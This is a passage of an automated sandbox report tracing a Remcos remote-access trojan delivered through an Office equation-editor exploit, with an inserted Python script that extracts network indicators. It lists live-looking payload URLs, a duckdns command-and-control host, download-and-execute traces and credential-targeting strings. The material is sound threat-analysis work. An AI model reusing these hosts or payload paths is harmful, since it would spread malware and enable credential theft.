                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80

                Networking

                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 192.210.214.9:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 192.210.214.9:14645
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 107.172.31.21:80 -> 192.168.2.22:49172
                Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 107.172.31.21:80 -> 192.168.2.22:49172
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
                Source: Malware configuration extractorURLs: 2024remcmon.duckdns.org
                Source: unknownDNS query: name: 2024remcmon.duckdns.org
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/EVRR.txt HTTP/1.1Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
                Source: Joe Sandbox ViewIP Address: 192.210.214.9 192.210.214.9
                Source: Joe Sandbox ViewIP Address: 88.99.66.38 88.99.66.38
                Source: Joe Sandbox ViewIP Address: 107.172.31.21 107.172.31.21
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /FoNVg0 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/sweetbuttersmoothbananahereforyou.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 192.168.2.22:49165 -> 88.99.66.38:443 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C525119.emf
                Source: global trafficHTTP traffic detected: GET /FoNVg0 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/sweetbuttersmoothbananahereforyou.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/EVRR.txt HTTP/1.1Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: RegAsm.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: zhort.de
Source: global traffic | DNS traffic detected: DNS query: ia803104.us.archive.org
Source: global traffic | DNS traffic detected: DNS query: 2024remcmon.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Wed, 28 Aug 2024 04:54:00 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 144 | Connection: close | X-DNS-Prefetch-Control: off | X-Frame-Options: SAMEORIGIN | Strict-Transport-Security: max-age=15552000; includeSubDomains | X-Download-Options: noopen | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Content-Security-Policy: default-src 'none'
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Wed, 28 Aug 2024 04:54:01 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 144 | Connection: close | X-DNS-Prefetch-Control: off | X-Frame-Options: SAMEORIGIN | Strict-Transport-Security: max-age=15552000; includeSubDomains | X-Download-Options: noopen | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Content-Security-Policy: default-src 'none'
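The network rows above are what an analyst turns into indicators first. The script below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling: it parses the "HTTP traffic detected" and "DNS traffic detected" rows into structured requests and queried names and then asks three analyst questions of them. It assumes the run-together layout that text extraction produced for this report (the CRLF between the request line and the headers is gone, so header boundaries are recovered from a fixed list of header names that occur in these rows); the sample rows are copied from the section and embedded as constructed input. The "no User-Agent" split rests on what the report itself shows: the URLs fetched without any User-Agent are the ones the report finds in powershell.exe and RegAsm.exe memory, while the Office/EQNEDT32 fetches carry the MSIE 7.0 / Trident/7.0 string.

```python
"""Structured network IOCs from the 'HTTP traffic detected' / 'DNS traffic
detected' rows of a Joe Sandbox report.

Added example, not part of the Joe Sandbox report.  It assumes the
run-together layout that text extraction produces for this report
("...HTTP traffic detected: GET /x HTTP/1.1Accept: */*UA-CPU: AMD64..."),
where the CRLF between request line and headers has been lost, so header
boundaries are recovered from a fixed list of header names seen in the rows.
"""
import re
from dataclasses import dataclass

# Rows copied from the report section above (constructed input for this example).
REPORT_ROWS = [
    "Source: global trafficHTTP traffic detected: GET /FoNVg0 HTTP/1.1Accept: */*UA-CPU: AMD64"
    "Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; "
    "Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg "
    "HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /xampp/nbc/EVRR.txt HTTP/1.1"
    "Host: 107.172.31.21Connection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.net"
    "Cache-Control: no-cache",
    "Source: global trafficDNS traffic detected: DNS query: zhort.de",
    "Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org",
    "Source: global trafficDNS traffic detected: DNS query: 2024remcmon.duckdns.org",
    "Source: global trafficDNS traffic detected: DNS query: geoplugin.net",
]

# Header names that occur in the rows; the alternation lets us find the
# boundary where one header's value runs into the next header's name.
KNOWN_HEADERS = ("Accept-Encoding", "Accept", "UA-CPU", "User-Agent", "Host",
                 "Connection", "Cache-Control")
HEADER_RE = re.compile("(" + "|".join(re.escape(h) for h in KNOWN_HEADERS) + "): ")
REQUEST_RE = re.compile(r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01](?P<rest>.*)$")
DNS_RE = re.compile(r"DNS traffic detected: DNS query: (?P<name>\S+)$")
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict

    @property
    def host(self) -> str:
        return self.headers.get("Host", "")

    @property
    def url(self) -> str:
        return f"http://{self.host}{self.path}"


def split_headers(blob: str) -> dict:
    """Recover 'Name: value' pairs from a header block whose CRLFs were lost."""
    marks = list(HEADER_RE.finditer(blob))
    headers = {}
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(blob)
        headers[m.group(1)] = blob[m.end():end]
    return headers


def parse_rows(rows):
    """Return (list of HttpRequest, list of queried DNS names) in report order."""
    requests, dns_names = [], []
    for row in rows:
        if (m := REQUEST_RE.search(row)):
            requests.append(HttpRequest(m["method"], m["path"], split_headers(m["rest"])))
        elif (m := DNS_RE.search(row)):
            dns_names.append(m["name"])
    return requests, dns_names


def urls(requests):
    """Full URLs for an indicator list (all rows here are plain http)."""
    return [r.url for r in requests]


def hosts_without_user_agent(requests):
    """Requests that carry no User-Agent at all.  In this report those URLs
    are the ones found in powershell.exe / RegAsm.exe memory; the Office and
    EQNEDT32 fetches send the MSIE 7.0 / Trident/7.0 string instead."""
    return [r.host for r in requests if "User-Agent" not in r.headers]


def literal_ip_hosts(requests):
    """Hosts addressed by raw IPv4 literal; these never appear as DNS queries."""
    return sorted({r.host for r in requests if IPV4_RE.fullmatch(r.host)})


def dns_only_names(requests, dns_names):
    """Names resolved but never used as an HTTP Host: candidates for a
    non-HTTP channel such as the RAT's TCP C2."""
    http_hosts = {r.host for r in requests}
    return sorted(set(dns_names) - http_hosts)


if __name__ == "__main__":
    reqs, names = parse_rows(REPORT_ROWS)
    for u in urls(reqs):
        print("url      ", u)
    print("no UA    ", hosts_without_user_agent(reqs))
    print("ip hosts ", literal_ip_hosts(reqs))
    print("dns-only ", dns_only_names(reqs, names))
```

Run stand-alone it lists the four URLs, the three hosts fetched without a User-Agent, 107.172.31.21 as the only raw-IP host, and 2024remcmon.duckdns.org as the one name resolved but never used over HTTP. To apply it to a full report, feed every "Source: global traffic" row into `parse_rows` and extend `KNOWN_HEADERS` with any header names the new rows contain, since a name missing from that list would be swallowed into the preceding header's value.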
Source: powershell.exe, 0000000D.00000002.511591510.00000000024B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://107.172.31.21
Source: powershell.exe, 0000000D.00000002.511591510.00000000024B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://107.172.31.21/xampp/nbc/EVRR.txt
Source: EQNEDT32.EXE, 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIF
Source: EQNEDT32.EXE, 00000009.00000003.492215861.000000000037F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFTC:
Source: EQNEDT32.EXE, 00000009.00000003.492215861.0000000000364000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.492251431.000000000036F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFU
Source: EQNEDT32.EXE, 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFj
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://b.scorecardresearch.com/beacon.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.620761784.0000000000572000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 0000000D.00000002.511591510.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
